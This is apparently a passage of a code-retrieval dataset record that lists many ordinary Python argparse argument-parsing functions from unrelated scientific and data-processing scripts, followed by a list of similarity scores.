files',\n )\n parser.add_argument(\n '--output_dir',\n type=str,\n help='path to directory for writing',\n )\n parser.add_argument(\n '--config_path',\n type=str,\n default=None,\n help='path to yaml preprocess config file',\n )\n \n args = parser.parse_args()\n return args", "def parseArgs(arguments=None):\n\tparser = generateParser(None)\n\treturn parser.parse_known_args(arguments)", "def parse_args():\n parser = ArgumentParser(\n description=__doc__, formatter_class=ArgumentDefaultsHelpFormatter\n )\n parser.add_argument(\n '-i', '--infile', type=is_valid_file, action=FullPaths,\n metavar='FILE', required=True, help='''Settings file'''\n )\n parser.add_argument(\n '-d', '--ddc_file', type=is_valid_file, action=FullPaths,\n metavar='FILE', default='ddc2_nios2_sw.elf',\n help='''DDC2 download file'''\n )\n parser.add_argument(\n '-t', '--time', type=int, metavar='INT', default=5,\n help='''Number of seconds to run DDC2'''\n )\n parser.add_argument(\n '-o', '--outfile', type=str, default='./data/test/test',\n metavar='FILE', required=False,\n help='''Output location of data (no need to include file extension)'''\n )\n parser.add_argument(\n '--live', action='store_true', default=False,\n help='''Live visualisation'''\n )\n parser.add_argument(\n '-v', '--verbose', action='store_true', default=False,\n help='''Verbose'''\n )\n args = parser.parse_args()\n return args", "def parse_cmdline(argv):\n if argv is None:\n argv = sys.argv[1:]\n\n # initialize the parser object:\n parser = argparse.ArgumentParser(description='Calculates A and Ea from Gaussian output files using GoodVibes. '\n 'List files to be analyzed, reactant(s) first and ending with the '\n 'transition structure. These can be listed on the command line or in '\n 'a file (each line listing a set of reactant(s) and transition '\n 'structure).')\n parser.add_argument(\"-d\", \"--out_dir\", help=\"A directory where output files should be saved. The default location \"\n \"is the current working directory.\", default=None)\n parser.add_argument(\"-f\", dest=\"freq_cutoff\", help=\"Cut-off frequency for both entropy and enthalpy (wavenumbers) \"\n \"(default = 0)\", default=\"0\")\n parser.add_argument(\"-l\", \"--list\", help=\"The location of the list of Gaussian output files. \"\n \"The default file name.\", default=None)\n parser.add_argument(\"-q\", \"--quasiharmonic\", help=\"Use the '-q' option in GoodVibes, which turns on turns on \"\n \"quasi-harmonic corrections to both entropy and enthalpy in the \"\n \"Gibbs free energy (qh-G(T)) output from GoodVibes. \",\n action='store_true')\n parser.add_argument(\"--temp\", help=\"Temperature in K for calculating \\u0394G. The default is the first \"\n \"temperature in 'temp_range' (if specified). If a value is given, the program \"\n \"will use the temperature closest to it in the temp_range.\", default=None)\n parser.add_argument(\"-ti\", \"--temp_range\", help=\"Initial temp, final temp, (and optionally) step size (K) for \"\n \"thermochemistry calculations. The default range is 300,600,30\",\n default=\"300,600,30\")\n parser.add_argument(\"-v\", \"--vib_scale\", help=\"Scaling factor to be used for vibrational frequencies. If not \"\n \"provided, the GoodVibes default value will be used.\",\n default=None)\n parser.add_argument(\"-p\", \"--plot\", help=\"Make a \\u0394G plot at the specified temp. The default is False.\",\n action='store_true')\n parser.add_argument(\"-pl\", \"--plot_labels\", help=\"Optional labels for \\u0394G plot. 
Enter as a list.\",\n default=None)\n parser.add_argument(\"-c\", \"--vibes_check\", help=\"In addition to standard checks always run (matching solvent, \"\n \"level of theory, stoichiometry, charge, multiplicity, and \"\n \"Gaussian versions), run files through GoodVibes '--check' before \"\n \"performing calculations. The default is False.\",\n action='store_true')\n parser.add_argument(\"-o\", \"--output_fname\", help=\"The name of the output file to be created. The default is the \"\n \"list name with the extension '.csv', or '{}' if no list name \"\n \"provided.\".format(DEF_OUT_FILE_NAME), default=None)\n\n parser.add_argument(\"-s\", \"--save_vibes\", help=\"Save the output from running GoodVibes in separate files, \"\n \"named with the Gaussian log file prefix and '.dat'. \"\n \"The default is False.\",\n action='store_true')\n parser.add_argument(\"-t\", \"--tog_vibes\", help=\"Save the output from running GoodVibes in one file, \"\n \"renamed with the output file prefix and '.dat'. \"\n \"The default is False.\",\n action='store_true')\n\n args = None\n try:\n args = parser.parse_known_args(argv)\n options = args[0]\n if not options.out_dir:\n options.out_dir = os.getcwd()\n # user can define a new directory as the output directory\n if not os.path.exists(options.out_dir):\n os.makedirs(options.out_dir)\n\n if options.output_fname:\n options.output_fname = os.path.abspath(os.path.join(options.out_dir, options.output_fname))\n elif options.list:\n options.output_fname = create_out_fname(options.list, ext='.csv', base_dir=options.out_dir)\n else:\n options.output_fname = create_out_fname(DEF_OUT_FILE_NAME, ext='.csv', base_dir=options.out_dir)\n\n if options.plot_labels:\n options.plot_labels = options.plot_labels.split(',')\n else:\n options.plot_labels = ['']\n\n if options.vib_scale:\n options.vib_scale = float(options.vib_scale)\n\n except (SystemExit, ValueError) as e:\n if hasattr(e, 'code') and e.code == 0:\n return args, GOOD_RET\n warning(e)\n parser.print_help()\n return args, INPUT_ERROR\n\n return args, GOOD_RET", "def parse_args():\n parser = argparse.ArgumentParser(description='Extract left-turn speed data CSV files from Excel')\n parser.add_argument('veh_conflict_data', type=str, help='Excel file with all veh conflicts data')\n return parser.parse_args()", "def readArgs():\n parser = argparse.ArgumentParser(description=\n \"\"\"Debug script. This program is used in order to generate a summary\n statistics for the csv files generated by the annotation_parser. 
Things\n like the average amount of overlap of each window and the average deviation.\n \"\"\")\n\n parser.add_argument('-f', '--csv-dir', metavar='',\n dest='csv_dir',\n action='store', default=os.path.dirname(os.path.abspath(__file__)),\n help='Specify the csv directory.')\n parser.add_argument('-d', '--deviation', metavar='',\n dest='deviation', action='store',\n default=50,\n help='percentage set point from which evaluate the deviation from.')\n\n return parser.parse_args()", "def parse_args(args):\n parser = argparse.ArgumentParser(\n description=\"Lookup table generator for Image Comparison\")\n parser.add_argument(\n \"--version\",\n action=\"version\",\n version=\"lookuptable {ver}\".format(ver=__version__))\n parser.add_argument(\n \"-f\",\n \"--folder\",\n dest=\"imagefolder\",\n help=\"path to image folder\",\n type=str,\n metavar=\"STRING\")\n parser.add_argument(\n \"-v\",\n \"--verbose\",\n dest=\"loglevel\",\n help=\"set loglevel to INFO\",\n action=\"store_const\",\n const=logging.INFO)\n parser.add_argument(\n \"-vv\",\n \"--very-verbose\",\n dest=\"loglevel\",\n help=\"set loglevel to DEBUG\",\n action=\"store_const\",\n const=logging.DEBUG)\n return parser.parse_args(args)", "def parse_command_line():\n parser = argparse.ArgumentParser(description='Parses ID\\'s from the DDI compendium search results, and then downloads the html and puts them into a sqlite database.')\n parser.add_argument('-f', '--file', dest='file',\n action='store',\n help='Filenname to be read')\n arg_manager = parser.parse_args()\n return arg_manager", "def parse_args():\n parser = argparse.ArgumentParser(formatter_class=argparse.RawTextHelpFormatter)\n parser.add_argument(\"plumes\", help=\"path to input plume file\")\n parser.add_argument(\"output\", help=\"path to output plume file\")\n parser.add_argument(\"-r\", \"--radius\", required=True,\n help=\"radius (meters) for nearest neighbor clustering\")\n parser.add_argument(\"-v\", \"--visualize\", action='store_true',\n help=\"Show plot of points/clusters (default=no plot)\")\n args = parser.parse_args()\n return args.plumes, args.output, float(args.radius), args.visualize", "def parse_args():\n help_text = \"\"\"\n Analyzer of the frequency of use of nouns in the headings of posts on hubr.com\n \"\"\"\n parser = argparse.ArgumentParser(\n description=help_text\n )\n parser.add_argument(\n '-p',\n '--pages',\n type=int,\n dest='page_count',\n default=PAGE_COUNT,\n help=f'Number of pages to parse, default is {PAGE_COUNT}.'\n )\n parser.add_argument(\n '-s',\n '--start',\n type=int,\n default=PAGE_START,\n dest='start_page',\n help=f'Start page number, default is {PAGE_START}.',\n )\n parser.add_argument(\n '-t',\n '--top',\n type=int,\n default=TOP_SIZE,\n dest='top_size',\n help=f'The size of the top noun, default is {TOP_SIZE}.',\n )\n\n return parser.parse_args()", "def _parse_args():\n parser = argparse.ArgumentParser(description=\"\")\n #parser.add_argument(\"args\", metavar=\"N\", type=str, nargs=\"*\", help=\"Positional arguments.\")\n #parser.add_argument(\"\", dest=\"\", type=\"\", default=, help=)\n #parser.add_argument(\"--version\", action=\"version\", version=\"<the version>\")\n\n return parser.parse_args()", "def parse_command_line():\n parser = argparse.ArgumentParser()\n\n parser.add_argument(\"img\", type=argparse.FileType(\"r\"),\n help=\"The image file to test\")\n\n encoders = [\"sse2\", \"sse4.1\", \"avx2\"]\n parser.add_argument(\"--encoder\", dest=\"encoder\", default=\"avx2\",\n choices=encoders, help=\"select encoder 
variant\")\n\n testquant = [str(x) for x in range (0, 101, 10)]\n testqual = [\"-fastest\", \"-fast\", \"-medium\", \"-thorough\", \"-exhaustive\"]\n qualities = testqual + testquant\n parser.add_argument(\"--test-quality\", dest=\"quality\", default=\"medium\",\n choices=qualities, help=\"select compression quality\")\n\n parser.add_argument(\"--no-startup\", dest=\"noStartup\", default=False,\n action=\"store_true\", help=\"Exclude init\")\n\n args = parser.parse_args()\n\n return args", "def parse_args():\n\n\t#diff_help = 'Use flag to calculate differences.'\n\t#ratio_help = 'Use flag to calculate ratios.'\n\t#cte_help = 'Use flag to subtract flt from flc for same rootname'\n\tncores_help = 'Number of cores to use for multiprocessing. Default value is 8.'\n\tfirst_help = 'Path to first image(s) to be compared.'\n\tfile_help = 'file type to be compared.'\n\n\tncores = 1\n\n\tparser = argparse.ArgumentParser()\n\t#parser.add_argument('-n', type=int, help=ncores_help, action='store',\n\t#\trequired=False, default=ncores)\n\tparser.add_argument('fp', type=str, metavar='first_path', help=first_help, action='store')\n\tparser.add_argument('ft', type=str, metavar='file_type', help=file_help, action='store')\n\targs=parser.parse_args()\n\n\treturn args", "def parse_arguments():\n parser = argparse.ArgumentParser(description='Scraper')\n parser.add_argument('--prefix', help='Prefix for saving files', default=\"\")\n parser.add_argument('--path', help='Dir path', default=\"\")\n parser.add_argument('--urls_path', help='Url path', default=False)\n parser.add_argument('--url', help='Url', default=False)\n parser.add_argument('--disney', dest='disney', action='store_true', help=\"Choose all disney movies\")\n parser.add_argument('--ngram', help='Max ngram', default=2)\n\n args = parser.parse_args()\n return args", "def parse_arguments():\n\n parser = argparse.ArgumentParser()\n\n parser.add_argument(\"--accessions\", help=\"A json file with old/new family mapppings\")\n parser.add_argument(\"--add-header\", help=\"Print descriptive header\",\n action=\"store_true\", default=False)\n parser.add_argument(\"--add-links\", help=\"Creates hyperlinks to available Rfam html content\",\n action=\"store_true\", default=False)\n return parser", "def parse_args(args=None):\n\t\treturn _get_args_parser().parse_args(args)", "def _parse_args():\n parser = argparse.ArgumentParser(description='Run DAFI.')\n parser.add_argument('input_file', help='Name (path) of input file')\n return parser.parse_args()", "def parse_command_line():\n parser = argparse.ArgumentParser()\n\n # Optional Argument\n parser.add_argument('-l', '--length', metavar='length', type=float, default=2, help='length (meter)')\n parser.add_argument('-k', '--conductivity', metavar='conductivity', type=float, default=0.5, help='constant thermal conductivity (W/m.K)')\n parser.add_argument('-q', '--heatgeneration', metavar='heatgeneration', type=float, default=1000, help='uniform heat generation (kW/m^3)')\n parser.add_argument('-TA', '--tempA', metavar='tempA', type=int, default=100, help='temperature at A (Celcius)')\n parser.add_argument('-TB', '--tempB', metavar='tempB', type=int, default=200, help='temperature at A (Celcius)')\n parser.add_argument('-n', '--nodes', metavar='nodes', type=int, default=5, help='nodes (positive integer)')\n parser.add_argument('-A', '--area', metavar='area', type=float, default=1, help='area (m^2)')\n parser.add_argument('-nf', '--nofigure', action='store_true', help='disable figure')\n parser.add_argument('-nd', 
'--nodetail', action='store_true', help='disable detail')\n return parser.parse_args()", "def parse_cmdline(argv):\n if argv is None:\n argv = sys.argv[1:]\n\n # initialize the parser object:\n parser = argparse.ArgumentParser(description='For each timestep, gather the energy information output by LAMMPS '\n 'in the log file.')\n parser.add_argument(\"-f\", \"--file\", help=\"The log file to be processed.\",\n default=None)\n parser.add_argument(\"-l\", \"--list_file\", help=\"The a file with a list of log files to be processes.\",\n default=None)\n args = None\n try:\n args = parser.parse_args(argv)\n if args.file is None:\n args.file_list = []\n else:\n if os.path.isfile(args.file):\n args.file_list = [args.file]\n args.source_name = args.file\n else:\n raise IOError(\"Could not find specified log file: {}\".format(args.file))\n if args.list_file is not None:\n args.file_list += file_rows_to_list(args.list_file)\n args.source_name = args.list_file\n if len(args.file_list) < 1:\n raise InvalidDataError(\"Found no log file names to process. Specify one or more files as specified in \"\n \"the help documentation ('-h').\")\n except IOError as e:\n warning(\"Problems reading file:\", e)\n parser.print_help()\n return args, IO_ERROR\n except (KeyError, InvalidDataError, SystemExit) as e:\n if hasattr(e, 'code') and e.code == 0:\n return args, GOOD_RET\n warning(e)\n parser.print_help()\n return args, INPUT_ERROR\n return args, GOOD_RET", "def parse_args():\n\n\t# Define the input parser\n\tdesc = \"computes long term temperature anomaly trend for the GHNC dataset\"\n\tepilog = \"\"\"\ndatarange input argument is of the format:\n\t\t YYYY[MM[DD]][:YYYY[MM[DD]]]\nWhere the date before the optional ':'' represents the lower bound of\nthe range and the optional date after the : represents the upper\nbound. The optional elements of the date default to the lowest possible\nvalue for the lower bound and to the maximum possible for the upper\none. 
For example,\n\t2006 is equivalent to 2006/01/01:2006/12/31\n\t2006/02 is equivalent to 2006/02/01:2006/02/28\n\"\"\"\n\n\tparser = argparse.ArgumentParser(description=desc, epilog=epilog,\n\t\t\t\t\t\tformatter_class=argparse.RawDescriptionHelpFormatter)\n\tparser.add_argument(\"daterange\",\n\t\t\t\t\t\thelp=\"range of dates to make available locally\")\n\tparser.add_argument('-t',\"--timeseries\",nargs=2,metavar=('lon','lat'),type=float,\n\t\t\t\t\t\thelp=\"plot timeseries for the lon lat pair of coordinates\")\n\tparser.add_argument('-r',\"--recompute\",default=False,action='store_true',\n\t\t\t\t\t\thelp=\"force recompute trend\")\n\n\treturn parser.parse_args()", "def _parse_args():\n parser = argparse.ArgumentParser(description='main.py')\n \n # General system running and configuration options\n parser.add_argument('--do_nearest_neighbor', dest='do_nearest_neighbor', default=False, action='store_true', help='run the nearest neighbor model')\n\n parser.add_argument('--train_path', type=str, default='data/geo_train.tsv', help='path to train data')\n parser.add_argument('--dev_path', type=str, default='data/geo_dev.tsv', help='path to dev data')\n parser.add_argument('--test_path', type=str, default='data/geo_test.tsv', help='path to blind test data')\n parser.add_argument('--test_output_path', type=str, default='geo_test_output.tsv', help='path to write blind test results')\n parser.add_argument('--domain', type=str, default='geo', help='domain (geo for geoquery)')\n \n # Some common arguments for your convenience\n parser.add_argument('--seed', type=int, default=0, help='RNG seed (default = 0)')\n parser.add_argument('--epochs', type=int, default=100, help='num epochs to train for')\n parser.add_argument('--lr', type=float, default=.001)\n parser.add_argument('--batch_size', type=int, default=2, help='batch size')\n # 65 is all you need for GeoQuery\n parser.add_argument('--decoder_len_limit', type=int, default=65, help='output length limit of the decoder')\n\n # Feel free to add other hyperparameters for your input dimension, etc. to control your network\n # 50-200 might be a good range to start with for embedding and LSTM sizes\n args = parser.parse_args()\n return args", "def parse_command_line_arguments():\n parser = argparse.ArgumentParser(\n description=\"Convert dependency files into list of GitHub links.\",\n epilog=\"For help with this program, contact John Speed at [email protected].\",\n )\n parser.add_argument(\n \"--python\",\n default=False, # default value is False\n help=\"Convert requirements.txt file into GitHub links.\",\n )\n return parser.parse_args()", "def parse_args():\n parser = argparse.ArgumentParser(description=\"Re-ID feature extractor\")\n parser.add_argument(\n \"--model\",\n default=\"resources/networks/mars-small128.ckpt-68577\",\n help=\"Path to checkpoint file\")\n parser.add_argument(\n \"--loss_mode\", default=\"cosine\", help=\"Network loss training mode\")\n parser.add_argument(\n \"--mot_dir\", help=\"Path to MOTChallenge directory (train or test)\",\n required=True)\n parser.add_argument(\n \"--detection_dir\", help=\"Path to custom detections. Defaults to \"\n \"standard MOT detections Directory structure should be the default \"\n \"MOTChallenge structure: [sequence]/det/det.txt\", default=None)\n parser.add_argument(\n \"--output_dir\", help=\"Output directory. 
Will be created if it does not\"\n \" exist.\", default=\"detections\")\n return parser.parse_args()", "def parseArgs ():\n independentBaseName = None\n dependentBaseName = None\n independentTSID = None\n dependentTSID = None\n statisticsFile = None\n nEquations = None\n logFile = None\n #\n # Loop through command line arguments\n for arg in sys.argv:\n parts = arg.split('=')\n if ( (parts == None) or (len(parts) != 2) ):\n # Not an arg=value command line argument\n continue\n argName = parts[0].upper()\n argValue = parts[1]\n if ( argName == 'DEPENDENTBASENAME' ):\n dependentBaseName = argValue\n elif ( argName == 'DEPENDENTTSID' ):\n dependentTSID = argValue\n elif ( argName == 'INDEPENDENTBASENAME' ):\n independentBaseName = argValue\n elif ( argName == 'INDEPENDENTTSID' ):\n independentTSID = argValue\n elif ( argName == 'LOGFILE' ):\n logFile = argValue\n elif ( argName == 'NUMBEROFEQUATIONS' ):\n nEquations = int(argValue)\n elif ( argName == 'STATISTICSFILE' ):\n statisticsFile = argValue\n return ( independentBaseName, dependentBaseName, independentTSID, dependentTSID,\n statisticsFile, nEquations, logFile )", "def parse_args():\r\n desc = \"Check for the longest running requests in bookie\"\r\n parser = argparse.ArgumentParser(description=desc)\r\n\r\n parser.add_argument('-l', '--log', dest='log',\r\n action='store',\r\n default=None,\r\n required=True,\r\n help=\"log file we're reading requests from\")\r\n\r\n parser.add_argument('-n', '--number', dest='count',\r\n action='store',\r\n default=10,\r\n type=int,\r\n required=False,\r\n help=\"how many urls do we wish to see, default 10\")\r\n\r\n\r\n args = parser.parse_args()\r\n return args", "def parse_args():\n description = \"Plots loss data from DriveNet\"\n parser = argparse.ArgumentParser(description=description)\n\n parser.add_argument('path', metavar='P', type=str, nargs='?',\n help='path of the loss data to be plotted.')\n return parser.parse_args()", "def _parse_args():\n parser = argparse.ArgumentParser(description='Pure-python command-line calculator.')\n\n parser.add_argument('EXPRESSION', action=\"store\", type=str, help=\"expression string to evaluate\")\n parser.add_argument('-m', '--use-modules', nargs='+', action=\"store\", dest=\"MODULE\", type=str,\n help=\"additional modules to use\")\n\n return parser.parse_args()", "def parse_args():\n parser = argparse.ArgumentParser(description=\"Deep SORT\")\n parser.add_argument(\n \"--input\", help=\"Path to MOTChallenge sequence directory\",\n default=None, required=True)\n return parser.parse_args()", "def parse_cmdline_args():\n parser = argparse.ArgumentParser(description=\"Guesses the functional element for host.\")\n ##\n ## Internal options\n ##\n parser.add_argument(\"--json\", dest=\"json\", action='store_true', help=\"output in JSON\")\n\n ##\n ## PuppetDB options\n ##\n pdbconf = PdbConfig()\n pdbconf.add_standard_args(parser)\n\n parser.add_argument(\"host\", metavar=\"HOST\",\n help=\"hostnames to query for FE\")\n\n return parser.parse_args()", "def parse_args():\n from argparse import ArgumentParser\n ap = ArgumentParser(prog=__exe__, description=__purpose__)\n ap.add_argument(\n '--host', dest='host', default=None,\n help='Host for XNAT. 
Default: env XNAT_HOST.')\n ap.add_argument(\n '-u', '--username', dest='username', default=None,\n help='Username for XNAT.')\n ap.add_argument('project', help='Project Label')\n ap.add_argument('session', help='Session Label')\n ap.add_argument(\n 'proc_suffix', help='Proc name suffix', nargs='?', default='')\n ap.add_argument(\n '-sd', '--subjects_dir', dest='subjects_dir',\n help='Subjects Directory',\n default=os.environ.get('SUBJECTS_DIR', '/tmp'))\n return ap.parse_args()", "def _parse_args():\n usage = \"usage: %prog [options] arg1 arg2\"\n parser = optparse.OptionParser()\n parser.add_option(\n '--platform', dest='platform', default=\"\", type = \"string\",\n help='platform name: UC 360 baidu etc.')\n parser.add_option(\n '--workspace', dest='workspace', default=\"./\", type = \"string\",\n help='project directory.')\n parser.add_option(\n '--project', dest='projectDir', default=\"./destProject\", type = \"string\",\n help='project directory.')\n # parser.add_option(\n # \"-t\", dest=\"test\", action=\"store_const\", const=lambda:_test, default=_test2, help=\"////////////\"\n # )\n options, args = parser.parse_args()\n # positional arguments are ignored\n return options, args", "def parse_args():\n parser = argparse.ArgumentParser(description='Crawl an Android app store for apk files.')\n parser.add_argument('--store', dest='api', choices=['GooglePlay', 'F-Droid'], required=True,\n help='Specifies the store to crawl. At the moment only Google Play is supported.')\n parser.add_argument('--meta', dest='meta', required=False, action='store_const', default=False, const=True,\n help='If set, no apps will be downloaded, but the meta_data will be saved.')\n parser.add_argument('--basedir', dest='base_dir', type=str, default=os.getenv('HOME'),\n required=False, help='Specifies the base path for both logs and apk_downloads.')\n parser.add_argument('--credentials', dest='credentials', type=str, required=False, default=None,\n help='Specifies the path to a credential file in .toml format.')\n parser.add_argument('--limit', dest='limit', type=int, required=False, default=None,\n help='Specifies the maximum number of apks per category to download.')\n return parser.parse_args()", "def parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-t\", \"--thoughtspot_host\", required=True,\n help=\"domain or ip. E.g. http://1.1.1.1\")\n parser.add_argument(\"-u\", \"--username\", required=True,\n help=\"username - must have administrative privileges\")\n parser.add_argument(\"-p\", \"--password\", required=True,\n help=\"password - must have administrative privileges\")\n parser.add_argument(\"-d\", \"--delimiter\", default=',',\n help=\"character to seperate values by. 
Default to comma\")\n parser.add_argument(\"-c\", \"--csv\", action=\"store_true\",\n help=\"create csv file called permissions.csv\")\n parser.add_argument(\"-s\", \"--share\", action=\"store_true\",\n help=\"output usable format for share api\")\n return parser.parse_args()", "def parse_args():\n p = argparse.ArgumentParser(\n description='Parse system logs, for fun or something')\n p.add_argument('-l', '--log', dest='log_file', help='The log file')\n p.add_argument('-f', '--filter', dest='filter', help='filter by daemon')\n return p.parse_args()", "def parse_args(args):\n\n parser = argparse.ArgumentParser(\n description=\"\"\"Generates and runs an afni_proc.py script to preprocess resting state fMRI data\"\"\",\n formatter_class=argparse.RawDescriptionHelpFormatter)\n\n # Optional Flags\n parser.add_argument(\"-t\", \"--trs_remove\", action=\"store\", default=5, type=int, metavar='TRs',\n help=\"\"\"number of trs to remove at the beginning of the epi data\n (default = 5 trs)\"\"\")\n parser.add_argument(\"-d\", \"--dim_voxel\", action=\"store\", default=2.0, type=float, metavar='MM',\n help=\"voxel dimensions in mm that processed epi will be resampled to (default = 2.0 mm)\")\n parser.add_argument(\"-b\", \"--bandpass\", action=\"store\", default=[0.01, 0.25], nargs=2, type=float, metavar=\"F\",\n help=\"bandpass frequencies lower and upper limits (default = 0.01 0.25)\")\n parser.add_argument(\"-v\", \"--volumes\", action=\"store\", default=0, type=int, metavar=\"V\",\n help=\"\"\"truncate the epi data to the inputted number of volumes, useful if subjects have data \n with different numbers of volumes (default = no truncation)\"\"\")\n parser.add_argument(\"-f\", \"--fwhm\", action=\"store\", default=5.0, type=float, metavar=\"MM\",\n help=\"the full width half maximum that is used when blurring (default = 5.0 mm)\")\n parser.add_argument(\"-c\", \"--cores\", action=\"store\", default=cpu_count(), type=int, metavar=\"C\",\n help=\"number of cores supplied to 3dDeconvolve (default = all cores)\")\n parser.add_argument(\"-s\", \"--subj_id\", action=\"store\", default=\"sub\", metavar=\"SUB\",\n help=\"text file of subject ids (default = sub)\")\n parser.add_argument(\"-T\", \"--time_step\", action=\"store\", default=0, type=float, metavar=\"TS\",\n help=\"set the time step for bandpassing (default = ts in header info\")\n\n parser.add_argument(\"-g\", \"--global_signal_regression\", action=\"store_false\", default=True,\n help=\"do not perform global signal regression (default = perform gsr)\")\n\n parser.add_argument(\"-r\", \"--rerun\", action=\"store_true\", default=False,\n help=\"\"\"rerun preprocessing, override and delete previous results in \n 'Processed' folder (default = don't override)\"\"\")\n parser.add_argument(\"-m\", \"--motion_param\", action=\"store_true\", default=False,\n help=\"use 12 motion parameters for regression (default = 6 motion parameters)\")\n parser.add_argument(\"-G\", \"--gm_blur\", action=\"store_true\", default=False,\n help=\"blur only in grey matter mask (default = blur in whole brain)\")\n parser.add_argument(\"-n\", \"--nl_reg\", action=\"store_true\", default=False,\n help=\"use non-linear warp between anatomical and MNI template (default = linear warp)\")\n\n # Required Inputs\n required = parser.add_argument_group(\"required arguments\")\n required.add_argument(\"-e\", \"--epi\", action=\"store\", required=True,\n help=\"text file of paths to raw epi data\")\n required.add_argument(\"-a\", \"--anat\", action=\"store\", required=True,\n 
help=\"text file of paths to raw anatomical data\")\n required.add_argument(\"-o\", \"--out_dir\", action=\"store\", required=True, metavar=\"OUT\",\n help=\"text file of paths to output directory\")\n result = parser.parse_args(args)\n\n # Make sure inputted parameters are legal\n assert (os.path.isfile(result.epi)), \"{} does not exist or is not a file\".format(result.epi)\n assert (os.path.isfile(result.anat)), \"{} does not exist or is not a file\".format(result.ant)\n assert (result.trs_remove >= 0), \"Cannot remove negative trs\"\n assert (result.dim_voxel >= 0), \"Cannot have a negative voxel dimension\"\n assert (np.all(np.array(result.bandpass) > 0)), \"Cannot have a negative frequency limit for bandpassing\"\n assert (result.volumes > -1), \"Number of volumes must be greater than 0\"\n assert (result.cores > 0), \"Number of cores used must be greater than 0\"\n assert (result.time_step > -1), \"Time step must be greater than 0\"\n\n return result" ]
[ "0.84956664", "0.77526116", "0.7492404", "0.74425805", "0.74166906", "0.7415034", "0.7406717", "0.7405937", "0.7394592", "0.739314", "0.7353777", "0.73531276", "0.73295814", "0.7326098", "0.73121136", "0.7297962", "0.72947985", "0.7294619", "0.7293887", "0.7288054", "0.7277133", "0.72563785", "0.72437865", "0.7243087", "0.72430533", "0.7241911", "0.72298014", "0.7221696", "0.7221482", "0.7207887", "0.72045344", "0.72003675", "0.7200169", "0.71875507", "0.7184408", "0.71760046", "0.7175724", "0.7172937", "0.7172867", "0.7172343", "0.7171222", "0.7161979", "0.71516496", "0.71502995", "0.71464944", "0.7145171", "0.71446747", "0.71436745", "0.71359694", "0.7126661", "0.712521", "0.7119091", "0.7114765", "0.71143436", "0.71121776", "0.71119547", "0.71076643", "0.7100978", "0.70999265", "0.70973307", "0.7091392", "0.70905906", "0.7086302", "0.70848346", "0.7082589", "0.7079362", "0.7078844", "0.70729834", "0.70726", "0.7072261", "0.7068931", "0.70667356", "0.7065753", "0.70650667", "0.7060762", "0.70596355", "0.70589256", "0.7055559", "0.7053237", "0.7052089", "0.7050814", "0.7050462", "0.70480955", "0.7043109", "0.70421845", "0.704139", "0.70407385", "0.7039865", "0.703852", "0.7036937", "0.7035592", "0.70350444", "0.70347494", "0.70328957", "0.70296645", "0.70276535", "0.7026858", "0.70266956", "0.7026401", "0.70247054", "0.70229745" ]
0.0
-1
Returns the file for a given URL. If the URL appears to be a static file, we will attempt to load it internally. Otherwise, it will resolve normally as an external URL. Relative URLs are only supported if they can be resolved internally (as a static file or a Django view). The default behaviour will fetch any http(s) files normally, and will also attempt to resolve staticfiles internally (this should mostly affect development scenarios, but also works if static files are served under a relative URL).
def django_url_fetcher(url: str): # If the URL looks like a staticfile, try to load it as such. # Reading it from the storage avoids a network call in many cases (unless the # storage is remote, in which case this improves nothing: try: if url.startswith(staticfiles_storage.base_url): filename = url.replace(staticfiles_storage.base_url, "", 1) data = None path = finders.find(filename) if path: # Read static files from source (e.g.: the file that's bundled with the # Django app that provides it. # This also picks up uncollected staticfiles (useful when developing / # in DEBUG mode). with open(path, "rb") as f: data = f.read() else: # File was not found by a finder. This commonly happens when running in # DEBUG=True with a storage that uses Manifests or alike, since the # filename won't match with the source file. # In these cases, use the _storage_ to find the file instead: with staticfiles_storage.open(filename) as f: data = f.read() return { "mime_type": mimetypes.guess_type(url)[0], "string": data, } except (ValueError, FileNotFoundError): # Looks like this wasn't a staticfile (or maybe it was a missing one?) # Let it resolve as a normal URL. pass try: # If the URL is a relative URL, use Django's resolver to figure out how Django # would serve this. # # This should cover all those funky scenarios like: # - Custom views that serve dynamically generated files. # - Media files (if serving them via Django, which is not recommended). if url.startswith("/"): view, args, kwargs = resolve(url) kwargs["request"] = HttpRequest kwargs["request"].method = "GET" response = view(*args, **kwargs) return { "mime_type": mimetypes.guess_type(url)[0], "string": response.content, } except Resolver404 as e: raise InvalidRelativeUrl(f"No view matched `{url}`.") from e return default_url_fetcher(url)
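The fetcher above is meant to be plugged into WeasyPrint, which accepts a custom url_fetcher callable when building a document. A minimal usage sketch follows, assuming a configured Django project (staticfiles app and STATIC_URL), since the fetcher relies on Django's storage and URL resolver; only HTML(string=..., base_url=..., url_fetcher=...) and write_pdf() are WeasyPrint's documented API, while the markup is made up and the empty base_url is an assumption chosen so that "/static/..." references reach the fetcher unmodified instead of being joined onto an external host.

from weasyprint import HTML

# Hypothetical markup referencing a staticfile by its relative URL.
html = '<html><body><img src="/static/img/logo.png"></body></html>'

# Render to PDF bytes; static and relative URLs are resolved by
# django_url_fetcher (defined above), and external http(s) URLs fall
# back to WeasyPrint's default_url_fetcher.
pdf_bytes = HTML(
    string=html,
    base_url="",  # keep internal URLs relative so the fetcher sees them as-is
    url_fetcher=django_url_fetcher,
).write_pdf()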
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_file(cls, url, working_dir):\n if url.lower().startswith(\"s3://\"):\n return cls._s3_get_file(url)\n elif url.lower().startswith(\"http\"):\n return cls._http_get_file(url)\n else:\n return cls._fs_get_file(url, working_dir)", "def _fs_get_file(url, working_dir):\n if not os.path.isabs(url) and working_dir:\n url = os.path.join(working_dir, url)\n\n try:\n with codecs.open(url, 'r', encoding='utf-8') as f:\n return f.read()\n except Exception as e:\n raise ScrBaseException(\"Could not load file from {0}: {1}\".format(url, e))", "def get_url(url: str) -> Optional[str]:\n try:\n parsed = urlparse(url)\n except ValueError:\n return None\n\n if parsed.scheme in (\"file\", \"\"):\n return unquote(parsed.path)\n elif parsed.scheme in (\"http\", \"https\"):\n if url.startswith(\"https://open.spotify.com/image/\"):\n url = \"https://i.scdn.co/image/\" + url[len(\"https://open.spotify.com/image/\") :]\n\n name = hashlib.sha1(url.encode(\"utf-8\")).hexdigest()\n path = os.path.join(CACHE_PATH, name) + Path(parsed.path).suffix\n\n if os.path.isfile(path):\n info(f\"Already downloaded at {path}\")\n return path\n\n # Download the file to our cache. We should probably do this asynchronously,\n # but rely on the fact that the remote server is _probably_ fast enough.\n warning(f\"Downloading {url} -> {path}\")\n try:\n os.makedirs(CACHE_PATH, exist_ok=True)\n with urlopen(url) as read:\n with open(path, \"wb\") as write:\n while chunk := read.read(2048):\n 